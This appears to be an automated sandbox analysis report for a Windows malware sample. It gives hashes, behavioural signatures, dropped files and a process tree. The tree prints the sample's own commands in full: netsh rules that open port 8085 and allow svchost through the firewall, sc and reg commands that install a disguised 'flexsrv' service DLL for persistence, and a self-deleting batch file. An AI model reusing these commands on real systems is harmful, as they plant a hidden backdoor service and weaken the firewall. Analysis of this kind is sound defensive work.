Analysis

  • max time kernel
    24s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-07-2024 05:27

General

  • Target

    5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe

  • Size

    338KB

  • MD5

    5f3143c9005305cc8d6948378c0a0e79

  • SHA1

    5c4048f06f6a79d0d7ae0d2f6da55e7b168dfd49

  • SHA256

    0c026dd1e317615a52a0f15b0834d91925bb976585f9e3bac5c96b0f41c1643e

  • SHA512

    f490010ddd45db028163c9c477fee0dc4872b75e816becd4929c0e602ef0d6885b984cbfa03401ab65ad20debf3e3326e6e18ace36415b75e303d3054d865073

  • SSDEEP

    6144:LiiUInLV5aQNbwXOH4MF2EigFTosv8lpRuFL3kM+:LinHYke3cEigFko8lWOb

Signatures

  • Creates new service(s) (2 TTPs)
  • Modifies Windows Firewall (2 TTPs, 2 IoCs)
  • Server Software Component: Terminal Services DLL (1 TTPs, 1 IoCs)
  • Deletes itself (1 IoCs)
  • Executes dropped EXE (1 IoCs)
  • Loads dropped DLL (4 IoCs)
  • Launches sc.exe (3 IoCs)

    Sc.exe is a Windows utility to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL (1 TTPs, 6 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Gathers network information (2 TTPs, 1 IoCs)

    Uses a command-line utility to view the network configuration.

  • Modifies Internet Explorer settings (1 TTPs, 2 IoCs)
  • Suspicious behavior: LoadsDriver (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\SysWOW64\CmD.exe
      CmD /c copy /B "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe"
      2⤵
      PID:2908
      • C:\Windows\SysWOW64\CmD.exe
        CmD /c ""C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe" --uninstall > "C:\Users\Admin\AppData\Local\Temp\setup_winver.bat""
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe
          "C:\Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe" --uninstall
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2912
      • C:\Windows\SysWOW64\cMd.exe
        cMd /c "C:\Users\Admin\AppData\Local\Temp\setup_winver.bat"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\reg.exe
          reG aDd "hklm\SOFTWARE\Microsoft\Internet Explorer\Main" /v TP /t ReG_Sz /d "1000" /f
          3⤵
          • Modifies Internet Explorer settings
          PID:2784
        • C:\Windows\SysWOW64\netsh.exe
          NetSh FIReWAlL Add allOweDPrOgrAm naMe="FLEXlm License Service" prOGram="C:\Windows\system32\svchost.exe" mode=ENABLE
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2736
        • C:\Windows\SysWOW64\netsh.exe
          nETsH fIrEwaLl aDD pOrToPEnIng tcP 8085 "HASPNT" eNABLe
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2060
        • C:\Windows\SysWOW64\sc.exe
          Sc CreATe "flexsrv" tyPE= share start= auto binPaTh= "C:\Windows\system32\svchost.exe -k netwisvc" DisplayName= "Object Protocol Logical Slip Driver CryptPKO Handler Download"
          3⤵
          • Launches sc.exe
          PID:2132
        • C:\Windows\SysWOW64\reg.exe
          rEg adD "hkLm\sYsTEm\CuRrenTcoNtRoLSeT\seRvIcES\flexsrv\Parameters" /v ServiceDll /t ReG_EXpaND_Sz /d "C:\Windows\system32\dimax.dll" /f
          3⤵
          • Server Software Component: Terminal Services DLL
          PID:2916
        • C:\Windows\SysWOW64\reg.exe
          rEg adD "hkLm\sYsTEm\CuRrenTcoNtRoLSeT\seRvIcES\flexsrv" /v FailureActions /t rEG_BInaRY /d 00000000000000000000000003000000140000000100000060EA00000100000060EA00000100000060EA0000 /f
          3⤵
          PID:2948
        • C:\Windows\SysWOW64\reg.exe
          ReG adD "hklm\SOfTwaRe\mIcrOSoFt\WiNdoWs nt\CURrENtveRSiOn\svcHoSt" /v netwisvc /t rEg_mULti_sz /d "flexsrv\0" /f
          3⤵
          PID:2660
        • C:\Windows\SysWOW64\sc.exe
          sc start "flexsrv"
          3⤵
          • Launches sc.exe
          PID:300
        • C:\Windows\SysWOW64\sc.exe
          sc boot ok
          3⤵
          • Launches sc.exe
          PID:2744
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig /flushdns
          3⤵
          • Gathers network information
          PID:2648
  • C:\Windows\SysWOW64\svchost.exe
    C:\Windows\SysWOW64\svchost.exe -k netwisvc
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    PID:2768

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\dimax.dll

    Filesize

    184KB

    MD5

    70c79b3f59de49550131c1f0a044726c

    SHA1

    b70d19dd619847d885b26c1d917d8cc5aa6e51be

    SHA256

    5ef25fce78378a4e912a53a41987dfd8e4ad033e193d8373866626744d57e1dd

    SHA512

    4636ebf5e695845df5fc0ed4f355e2c6e567018a2fab1b0d012ae23170904db278798d7296a15d73f205bced1d27692dc5e74944473fb5b7821cc3b22378c8d6

  • C:\Users\Admin\AppData\Local\Temp\hlemunt.sys

    Filesize

    42KB

    MD5

    9d1e852815ab22661e2b19d004e14aef

    SHA1

    5918c2320609e341ac3b3bac5ed15890e92574f4

    SHA256

    f20dff429ca8931b4bcb71d28f6449d7ee7dfb7f10f85c9f634b1a08dbc29fb3

    SHA512

    2877dcfe36bf9ec3b6560c5ba811a68808320828f87cd5183b334bd5d7528f510a6b83300f68c59505fde73145f16648e4d680a1b5384c8951bf572d3879becc

  • C:\Users\Admin\AppData\Local\Temp\setup_winver.bat

    Filesize

    1KB

    MD5

    6568ffd046fdb73f5a179ce0b0b162c2

    SHA1

    4e25ef697f3875dcc57d279b67e935f7ba5c5ece

    SHA256

    5cf26e532474b6d1344dde1c984cca7c8d82b736aecf5fb2e1f1931ec1861838

    SHA512

    d69b2e1ab9907f993b31846964009bb249a756a189f2b925ae170ff7baed0ea6c49caf460330a88e3f225a6cb77193b578ce061584cf0bc06b0142e96c81c2b3

  • \Users\Admin\AppData\Local\Temp\5f3143c9005305cc8d6948378c0a0e79_JaffaCakes118.exe.exe

    Filesize

    338KB

    MD5

    5f3143c9005305cc8d6948378c0a0e79

    SHA1

    5c4048f06f6a79d0d7ae0d2f6da55e7b168dfd49

    SHA256

    0c026dd1e317615a52a0f15b0834d91925bb976585f9e3bac5c96b0f41c1643e

    SHA512

    f490010ddd45db028163c9c477fee0dc4872b75e816becd4929c0e602ef0d6885b984cbfa03401ab65ad20debf3e3326e6e18ace36415b75e303d3054d865073